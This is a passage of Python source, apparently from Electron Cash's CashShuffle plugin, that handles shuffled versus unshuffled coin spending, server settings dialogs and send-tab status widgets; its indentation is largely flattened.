# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
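        # Hook: returns extra text appended to the status bar balance label,
        # summarizing the shuffled total for this wallet. Also refreshes the
        # send tab extra widget as a side effect.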
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
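        # Hook: returns extra explanatory text shown alongside the
        # "Not enough funds" message, telling the user how much is sitting in
        # the other bucket (shuffled vs. unshuffled) or is busy shuffling.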
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
        extra.refresh(shuf, unshuf, uprog, usas)
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
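        # Stops and restarts the background shuffling thread for every enabled
        # window, re-reading the (possibly changed) network settings from the
        # config; typically invoked after the CashShuffle server settings change.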
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, hence why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
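        # Returns True if the user chose Ignore (proceed with the unreachable
        # server anyway), False if they chose Retry.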
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window:
# window will raise itself.
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
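        # Removes deprecated ("defunct") keys from either the global config or a
        # wallet's storage, depending on which object we were handed.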
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
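    # The per-wallet counters below live in wallet.storage. The session counter
    # is bumped each time shuffling is enabled for a wallet (see
    # _enable_for_window); the shuffle counter is presumably bumped elsewhere as
    # shuffles complete. The session counter gates the "are you sure?" nag in
    # warn_if_shuffle_disable_not_ok below.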
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Electron Cash, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
            # Note: the GUI refresh() will later also set this string, but we set it immediately here so the UI feels snappier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
if not hasattr(self.window.wallet, '_shuffle_patched_'):
            # this can happen if the rate-limit timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limited. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
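        # Lazily build two families of text templates: bold for amounts matching
        # the currently selected spending mode, normal for the rest. Each family
        # has singular/plural variants, and each variant is an (amount template,
        # coin-count template) pair.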
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
        ''' Returns one of the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
            self.onSpendRadio()  # the slot won't get called when setting radio buttons programmatically, so we force-call it here
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
    ''' Abstract base class -- do not instantiate this directly, as doing so will
    raise errors because the pyqtSignal cannot be bound to a non-QObject.
    Instead, use SettingsDialog and/or SettingsTab, which inherit from this and
    are proper QObject subclasses.
    Also call __init__ on the QObject/QWidget first, before calling this
    class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
            except Exception:
                self.print_error("Error loading server list from {}: {}".format(fname, str(sys.exc_info()[1])))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
        if d.get('failed'): # A dict with only the 'failed' key means the connection failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Electron Cash is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
